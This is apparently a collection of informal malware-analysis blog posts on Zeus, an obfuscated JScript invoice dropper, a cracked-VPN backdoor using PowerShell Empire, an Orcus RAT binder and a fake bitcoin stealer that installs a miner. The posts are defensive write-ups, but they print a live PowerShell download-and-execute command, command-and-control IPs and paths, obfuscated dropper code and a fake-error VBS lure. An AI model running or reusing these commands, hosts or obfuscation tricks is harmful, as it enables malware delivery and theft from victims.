Zeus botnet simple analysis

A little analysis of Zeus botnet.

It was done for someone to see how it works and I share it with you.

bot.exe

• OEP: 0040DCA0
• COMPILER: Borland Delphi 6.0 – 7.0
• MD5: 8a849d20c0a954f45566cec53acc9263
• SHA-1: 764c29fd18c3f3c4d9ba3fe394655f2ed2ec0c01

Injects into remote processes
Injected into “explorer.exe”
 
Drops files:
 

giep.exe

MD5: 769919e56bd4e9e1e906559c1c36bdf6
SHA-1: 39ed72d34e02e1674742cb47bbd6ebdad13f7931
Reg: HKU\S-1-5-21-2442644137-1929233181-142757687-1000\Software\Microsoft\Windows\CurrentVersion\Run\{74A201A8-2DEE-69F0-F124-27DF3D9773DA}: “C:\Users\Insider\AppData\Roaming\Qioho\giep.exe”
https://www.virustotal.com/#/file/5069bc991ff37817bb05e6bb453c9c44d22ef2719bb0d4f72a3ca30c544f040c/detection

• Same atributes like bot.exe

Some of the processes made by the bot.exe action:
 

• CreateFile
• RegOpenKey
• RegisterClass
• CoCreate
• CreateThread
• RegCreateKey
• RegSetValue
• ProcessStarted

 
 Network traffic:
 
In the same way it is using the /POST request for sending stealed data, when the victim visits some bank account, paypal…etc.
Botnet host directory and login page:
 

H**p://xxx.xxx/adminpanel/admin.php

The remove is easy. You just have to follow the path’s to find the droped executables and delete the created registers.

Unseen stample of malware-Modified coding code – DarkWeb TOR project.

Hello.
Today I had a nice surprise. I found in the Spam file an email telling me they just sent me an electronic invoice.
I have to say that the surprisses are more and more.

You will see!!!

Part 1 – The infected file & dropped files

Dear Madam / Madam,

We would like to inform you that you have an electronic invoice issued. The attachment is an official accounting document and complies with the requirements of the Electronic Document and Electronic Signature Act.
If you have additional questions or need other information, please do not hesitate to contact us with the contact details on your electronic invoice.
Thank you for being a customer of ENERGO-PRO.
We wish you a successful day.
* This email can contain personalized information. If you are not the recipient for whom it is intended, please delete it. Thank you!

I have a file attached named öá¬ÔŃÓá No 0258923817 (3)… yeeep and is a JScript file.
Scanned with Virus Total.

The -1 vote is mine! (lol).
So 0 of 60 antivirus engines detects this virus.In the previous article I wrote about the problem of detection.

Security Advice – The Antivirus is just a security helper!

Running the öá¬ÔŃÓá No 0258923817 (3) script –> injects code on vbscript and tries to connect to:

All the connection running this script:

• withadvertisingthe.com
• myip.opendns.com
• noreply.org
• riseup.ne
• Faravahar Tor Authority Directory – 199.254.238.52
• Tor Exit Router – 178.16.208.59
• vps.net
• 91.219.237.154
• digitalocean.com
• voxility.net

All are Tor servers and VPN servers.
GET /tor/status-vote/current/consensus from hosts:
86.59.21.38/154.35.175.225
There are BitBlinder Project files(see on github more informations). Remember this.. i will give you some good info later!
Connected servers:
5.149.213.224/86.59.21.38/199.254.238.52/154.35.175.225/178.16.208.59/46.23.72.81/91.219.237.154/46.101.183.160/93.115.84.143/165.227.130.167
What else to show you from this file…

Last write session:

Mades alot of changes after running:

• Remote AccessTries to identify its external IP address
• Stealer/PhishingScans for artifacts that may help identify the target
• Touched instant messenger related registry keysPersistenceInjects into explorer
• Injects into remote processes
• Modifies auto-execute functionality by setting/creating a value in the registry
• Spawns a lot of processes
• Writes data to a remote process

Dropped files:

• adprtext.dll
• agreebowl.dll

Let’s see the agreebowl.dll

Part 2 – The “öá¬ÔŃÓá No 0258923817 (3)” file code.

The 0/60 file detection is due to the programming mode. The programmer used an ingenious way to write the code to have a signature different from that of the viruses.
Here i will show you a part of thecompiled code:

ozen.decideWorry+sickCityAdditionDepth[15]+seriousPaidRegion.happened;}function pigDutyUnusual(passForeignPush){return lowerCountryCharacter[5];}function frontFurtherAfterMadeConstruction(wasMoodCleanRefusedPush){return slightForgotDiscussionHistoryGiant[3]+temperatureBeforeDo.audienceCircus+evidenceCompositionCrackPrincipalEar[2]+seriousPaidRegion.engineer+sickCityAdditionDepth[3]+sickCityAdditionDepth[4]+breatheCupParentEscape[13]+biggerShellsDeterminePorchCreature[7]+temperatureBeforeDo.twoWest+importanceArtAgain[7];}function compareSpeciesGiantBuildingSeveral(excitedCanScoreCarefulFine){return roughWhenPlentyDistanceFrozen.decideWorry+townOrdinaryDarkFlowerLibrary.careful+importanceArtAgain[7]+temperatureBeforeDo.audienceCircus+wonProvideMostOrdinaryRoad.railroadOr+slightForgotDiscussionHistoryGiant[7]+importanceArtAgain[7]+evidenceCompositionCrackPrincipalEar[2]+breatheCupParentEscape[17];}var clearlyPieceBillEarlierOrganization=[];
clearlyPieceBillEarlierOrganization[todayBehaviorStrengthQuietlyTypical(‘p-_sI1owb)jB:o6’)](visitorBehindSpeak(‘9
K0c0htw(o.kvr’));
var packageLargePig=[-314];
var tearsKitchenCatchNeck=[66];
var fifteenRunStraightSpeech=[];
var aidMirrorWeakProgressInclude=[7];
var sightDistanceDid=[1];
var taskAnywayHungry=[mightEmptyCarriedRapidlyOnce(’26P:Y&kwgPLW0′)];
function partRelatedBatBaby(metFreeSomeone){

Part 3 – BitBlinder project

BitBlinder project – A way to create your own hidden services on DarkWeb.
Project-specific files:

• http://154.35.175.225/tor/status-vote/current/consensus.js
• http://91.219.237.154/tor/server/fp/6a7479eb4378b946dc2a65a7f2c706b42bae2ebd

Well… that was a long story and the end it’s here!
0/60 … remember that!!!

Have fun & Stay safe!!!

Malware research/reverse – Payload backdoor

Hello.
I have some free time and I try to deal with internet safety. I’m just a small drop of the ocean, but I’m here!
Today I will introduce you something different.
As usual, I downloaded a few softwares and started the analysis.
I have a ”great offer”:
Hotspot Shield VPN 7.20.8.Elite Cracked

Woooow!!!(just kidding)

We have 3 important files.
Setup.exe and Update.exe appear to be archived files and from previous posts we know what this means, but today our target is the HSS v.2.exe file.


It is noticed that it is the latest file created.
Also, the installation method requires using this file.

OK.Let’s scan this time!
Virus Total Report

20/68 detection?!?
I mean, only 20 of the antivirus applications will see this file as a virus.

OK. It’s normal to be seen by antivirus. It’s just a crack, a patch, etc. You have to disable the antivirus to install it, it’s just a pirated software.

Let’s get started
It looks like this .exe is actually a .rar archive

After opening, he has a lot of work in the background.
We let him do the job to find out what he is doing!

When everything is quiet, we see that something is left to work.

powershell.exe -nop -windowstyle Hidden -c “IEX (New-Object Net.WebClient).DownloadString(‘https://gist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1/raw/9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1

The virus runs through the application Powershell.exe, being connected to external sources.

h**ps://sgist.githubusercontent.com/hampros2/7d71db98acfeaa75ec89dcb53eb796c1raw9681d583be4c36977286b8171be930b0fd702a64/fuck.ps1

Also connectiong to:

http://83.251.132.4
/admin/get.php
/login/process.php
/news.php

After investigation I found out that it’s about a payload project.

Currently Empire Power Shell has the following categories for modules:

• Code Execution – Ways to run more code
• Collection – Post exploitation data collection
• Credentials – Collect and use creds
• Exfiltration – Identify egress channels
• Lateral Movement – Move around the network
• Management – Host management and auxilary
• Persistence – Survive reboots
• Privesc – Privilege escalation capabilities
• Recon – Test further entry points (HTTP Basic Auth etc)
• Situational Awareness – Network awareness
• Trollsploit – For the lulz

Prodefence.org
What can I say …. be careful!
Have fun & stay safe!!!

Malware reverse – RAT backdoor

Hello again.
After a few tested files, I found something good to analyze.
On hacking or warez forums, you find a lot of infected files.
Today I analyzed a program used by hackers to hide their viruses. A program that combines two files, and in use one is visible and the other runs hidden.

Although the one who posted the software announced it is a cracked version, it still seems strange that the name is Celeste instead of Celesty, and the details are completely missing.

After a brief analysis I realized that the software already contains two files and both executables, that is, exactly what the Celest software should do.

The executables seem to be the Celesty software and something called Encrypt and if we remember the role of the binder, we understand that Celesty will appear on the screen and Encrypt will be hidden.

Analyzed in more detail, we can see that Celest’s resources are exactly the two hidden files.

OK. If you think things have become complicated … wait a little longer.
Moving to more advanced techniques, I’ve been able to discover what’s going on beyond that first downloadable software.
Do you remember how it all started?
A .rar file … An .exe extracted from it … Two hidden files.
Now look at my reverse malware folder!

Quite interesting!

I double click as a victim and let the executables do what they want.
Now that everything seems quiet, I can see that the file OrcusWatchdog does not want to stop, even if you can stop it “Keep alive” it brings it back to life.

Okay, let’s see what’s going on.
Celest_Binder looked ok at first, but what it brings with it is not good for the computer.
Drops executables files:

OrcusWatchdog.exe
CELESTY.EXE
ENCRYPT.EXE
svchost_.exe
sbziixqt.dll
RESD05E.tmp

ENCRYPT file

Creates fake process: Users\vchost\svchost.exe

Creates new process: AppData\OrcusWatchdog.exe

Writes data to a remote process:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

OrcusWatchdog
Playng with:

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config

svchost_

Contains ability to manipulate the desktop.
Password stealing functions.
Recording the keyboard strokes.

So, let’s not mess up so much, I can tell you it’s a *remote administration tool that can do the following:

Control

Basic information about the client (operating system, language, privileges, path, ip address, …)
Uninstall, Kill, Make Admin
Computer

Get a lot of information about the client’s pc
Categories: Operating System, System, Bios, Hardware (Processor, Videocard), Software, Network (local addresses, geo location data), Drives

Passwords

Recover passwords from famous applications (Google Chrome, Mozilla Firefox, FileZilla, Internet Explorer, JDownloader, Opera, Thunderbird, WinSCP, Pidgin, …)
Recover cookies from webbrowsers (Google Chrome, Mozilla Firefox, Yandex)
File Explorer

Interface like the Windows file explorer
Download, rename, create or remove files and directories
Download directly to the server
Execute files with arguments, verbs and other settings
Show properties of files (size, dates, details like size of a picture or bitrate of a video) and calculate hash values (MD5, SHA1, SHA256, SHA512)
Upload files
Open Console here
Go back/forward
Pinned folders of the client’s system are directly added to the tree view (Dropbox, OneDrive, Creative Cloud Files, etc.)
Support for special folders like the recycle bin
Search for files in the current folder
Enter path directly or select the path with autocomplete and drop down

Programs

Receive all installed programs
Start uninstaller of a program
Open path in File Explorer

… and a lot *more!
That’s the situation!
Things are not as you want and do not forget!
When something is free, you are not the customer but the product!

Have fun & Stay Safe!!!

*Orcus Remote Admin

Fake bitcoin wallet stealer – Silent miner backdoor – Reverse

I found another backdoored software. This was made for thouse who want to become hackers… or to make some easy money.
Founded on Youtube.com with a search ”Bitcoin stealer”.
How to use it… the uploader helps you.

• Senha: Techup
• Desativar Antivirus (Claro, se trata de um hack)
• Chave
• Servidor de Ligação
• Adicionar a sua carteira
• Use Proxy
• Aceite os termos
• Verifique se o programa está atualizado

• Password: Techup
• Disable Antivirus (Of course, this is a hack)
• Key
• Connection Server
• Add to your wallet
• Use Proxy
• Accept the terms
• Make sure the program is up to date

All you have to do is to download it, run it and you become a rich guy…
We will not double click the .exe file…( it looks like a .exe).. or better say this SFX rar archive?!?
Let’s see something about the archive with richt click and propreties!
I dont like this SILENT=1. LOL If we dont run the ”.exe”, the backdoor will not run in the background, so let’s Extract it … and surprise.. there are more then one file, including the backdoor files.

winhlp32.exe

Isass.exe

After reversing the backdoor files i found this:

C:/Users/user/Documents/projects/minergate.app/sources/cudaminer/src/cuda_cryptonight_core.cu

… so what about this minergate?!?
With this lovely usage:

Usage:
minergate-cli [-version] -user <email> [-proxy <url>] -<currency> <threads> [<gpu intensity>] [-<currency> <threads> [<gpu intensity>] …] [-o <pool> -u <login> [-t <threads>] [-i <gpu intensity>]]

And so many options:

Options:
-user account email from minergate.com
proxy server URL. Supports only socks protocols (for example: socks://192.168.0.1:1080
possible values: bcn xmr qcn xdn fcn mcn aeon dsh inf8 <mm_cc>+bcn <mm_cc>+xmr <mm_cc>+qcn <mm_cc>+xdn <mm_cc>+aeon <mm_cc>+dsh. Where <mm_cc> is fcn or mcn
threads count for specified currency
GPU mining intensity (NVidia only) (values range: 1..4. Recommended: 2)
mining pool URL
mining pool login
CPU threads count
GPU mining intensity

Conecting to: h**ps://minergate.com
It seems that we have a nice backdoored software.
After you will run it.. in the backgound a silent miner will be instaled on your computer and in front of you will apare a nice error like this:

Blockchain Wallet Stealer 2017\message.vbs
x=msgbox(“Hardware is not compatible, try on another PC or restart and run with disabled antivirus.”, 0+16, “Error“)

If you dont understand, you will download this software, after the first run will appear a error message and it will not work, but in underground you will have already instaled a virus.
This time the virus is a Silent Miner, that will use your computer to work for some hacker and this will help hit to make some bitcoins.

The Youtube channel Teck up has more videos like this one .. and all of them are with this backdoor.

Have fun & Stay safe!!!